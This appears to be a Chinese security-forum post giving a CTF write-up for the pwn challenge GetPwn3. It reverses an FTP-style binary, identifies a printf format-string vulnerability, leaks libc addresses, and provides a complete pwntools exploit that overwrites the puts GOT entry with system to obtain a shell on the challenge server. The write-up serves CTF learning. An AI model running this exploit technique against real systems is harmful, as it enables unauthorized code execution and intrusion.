首页
社区
课程
招聘
[原创]【KCTF-pwn】GetPwn3
发表于: 2023-6-8 00:26 14578

[原创]【KCTF-pwn】GetPwn3

2023-6-8 00:26
14578

get_pwn3


目录

目录


逆向分析

首先是要求用户输入一个用户名,随后对输入的字符进行+1,随与sysbdmin进行比较,不相同程序退出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int command; // eax
  char s1[40]; // [esp+14h] [ebp-2Ch] BYREF
  int nop; // [esp+3Ch] [ebp-4h]
 
  setbuf(stdout, 0);
  ask_username(s1); //用户输入后对每个字符+1
  ask_password(s1); //"sysbdmin"进行比较,既用户需要输入"rxraclhm"
  while ( 1 )
  {
    while ( 1 )
    {
      print_prompt();//打印printf("ftp>")
      command = get_command();//获取用户输入遂转成数字 get:1 put:2 dir:3
      nop = command;
      if ( command != 2 )
        break;
        //申请一个0xF4大小的heap,随后由用户输入当前段的名字和内容
        //名字可由 dir 打印,也可用于打印内容时作为判断的索引
        put_file();
    }
    if ( command == 3 )
    {
      //从heap中索引每个块的名字,拼接,遂使用puts打印出来
      show_dir();
    }
    else
    {
      if ( command != 1 )
        exit(1);
      //从heap中根据块名进行索引,并使用printf(content)将其打印,存在字符串格式化漏洞
      get_file();
    }
  }
}

总结

存在以下漏洞

  • 格式化字符串

攻击思路

利用格式化字符串篡改GOT

  • 先泄露libc(申请的块名为;/bin/sh;)
  • 篡改puts函数的got表
  • 输入dir使其调用show_dir即可执行puts(name)

泄露libc并确定libc版本

由于题目并没有给出libc文件,所以需要我们自己去确认,使用格式化字符串泄露多个函数偏移,后使用工具下载匹配的libc文件,最终泄露和测试结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
===============2023-06-07 23:24:54===============
『puts』================>『0XF7679150
 
===============2023-06-07 23:26:18===============
『strcmp』================>『0XF76AD7B0
 
===============2023-06-07 23:26:51===============
『malloc』================>『0XF76232C0
 
===============2023-06-07 23:27:35===============
『fread』================>『0XF7595D60
 
===============2023-06-07 23:28:52===============
『LibcBase』================>『0XF7605000

根据下载到的libc文件最终计算的LibcBase = 0XF7605000,找到libc

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from MUC.ezpwn import *
 
p,pb,libc = init(log="debug",arc="i386",b=32,r="123.59.196.133:10027")
 
password = "rxraclhm"
p.sendlineafter("Name (ftp.hacker.server:Rainism):",password)
 
def put(name,content):
    p.sendafter(b"ftp>",b"put")
    p.sendlineafter(b"please enter the name of the file you want to upload:",name)
    p.sendlineafter(b"then, enter the content:",content)
 
def get(name):
    p.sendafter(b"ftp>",b"get")
    p.sendlineafter(b"enter the file name you want to get:",name)
 
def dir():
    p.sendafter(b"ftp>",b"dir")
 
put(";/bin/sh;\x00",b"%8$s"+p32(pb.got["puts"])+p32(0))
get(";/bin/sh;\x00")
putsAddr = u32(p.recvuntil(b"\xf7")[-4:])
calcLibcBase("puts",putsAddr)
sysAddr = getFunc("system")
 
sH = (sysAddr >> 16) & 0xFFFF
sL = sysAddr & 0xFFFF
payload = f"%{sL}c%14$hn%{sH-sL}c%15$hn".ljust(28,"A")
payload = payload.encode() + p32(pb.got["puts"]) + p32(pb.got["puts"]+2)
put("pwn",payload)
get("pwn")
dir()
 
p.interactive()

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 1
支持
分享
最新回复 (1)
雪    币: 21837
活跃值: (30536)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2023-6-8 09:25
1
游客
登录 | 注册 方可回帖
返回
//